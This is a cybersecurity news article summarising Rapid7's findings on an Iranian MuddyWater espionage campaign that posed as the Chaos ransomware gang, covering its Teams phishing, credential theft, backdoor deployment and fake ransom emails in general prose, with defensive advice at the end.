Iran's MuddyWater Masquerades as Chaos Ransomware Gang in Espionage Campaign
Rapid7 researchers have uncovered an Iranian state-sponsored espionage operation, attributed with medium confidence to MuddyWater, that posed as the Chaos ransomware gang to conceal a data theft and false-flag campaign.
Rapid7 researchers have identified an Iranian state-sponsored espionage operation that masqueraded as the Chaos ransomware gang to hide a data theft and false-flag campaign. The intrusion, detected earlier this year, is attributed with medium confidence to MuddyWater, a group linked to Iranian intelligence (MOIS) and previously tied to attacks on Western government and banking networks. The attack chain began with a Microsoft Teams phishing campaign, where attackers social-engineered victims into sharing their screens and entering credentials into local text files, even modifying MFA settings to allow attacker-controlled devices to complete authentication.
Once inside, the attackers deployed a remote management tool (AnyDesk) and used browser-based phishing pages, including a fake Microsoft Quick Assist page, to lift additional credentials. Armed with valid access, they executed commands via RDP and used curl to download payloads, including a backdoor malware named Darkcomp, a malicious Microsoft WebView2 loader to disguise traffic, and an encrypted configuration file. The attackers then performed lateral movement using compromised accounts, scooping up sensitive data along the way.
The attackers used the same accounts to send internal emails notifying organization leaders about the intrusion and data theft, including an onion link to Chaos ransomware's data leak site (DLS), where a corresponding entry appeared with data hidden behind a countdown timer. Follow-up emails aimed to build the illusion of a genuine ransomware attack, instructing recipients were told to look for a file containing 'access credentials' for ransom negotiations, but the file did not exist. Unlike typical ransomware operations, there was no file encryption, no way to contact the attackers, and no demand for payment.
Rapid7 believes the group did this as an extension of its false-flag operations to provide a plausible front for cyberespionage activity or preposition work for potential destructive cyberattacks. The researchers noted that MuddyWater and Iranian intelligence have previously been linked to similar tactics, including an attack on an Israeli hospital falsely attributed to a Qilin affiliate. 'Following the subsequent public attribution of that incident to the MOIS, it is plausible that the group adopted alternative ransomware branding, in this case Chaos, in an effort to reduce attribution risk and maintain a degree of plausible deniability,' the researchers wrote.
The unique benefits of masquerading as ransomware crooks include muddying attribution for attacks by leaving behind ransomware breadcrumbs, as well as redirecting defensive efforts toward locating signs of ransomware deployment instead of the backdoors that underpin espionage activity. The campaign highlights the evolving sophistication of state-sponsored threat actors who blend espionage with false-flag operations to evade detection and attribution.
Organizations are advised to remain vigilant against social engineering attacks, particularly those involving Microsoft Teams and MFA manipulation, and to monitor for unusual lateral movement and data exfiltration patterns. The Rapid7 report serves as a reminder that not all ransomware incidents are financially motivated, and that defenders must look beyond surface-level indicators to uncover the true nature of an intrusion.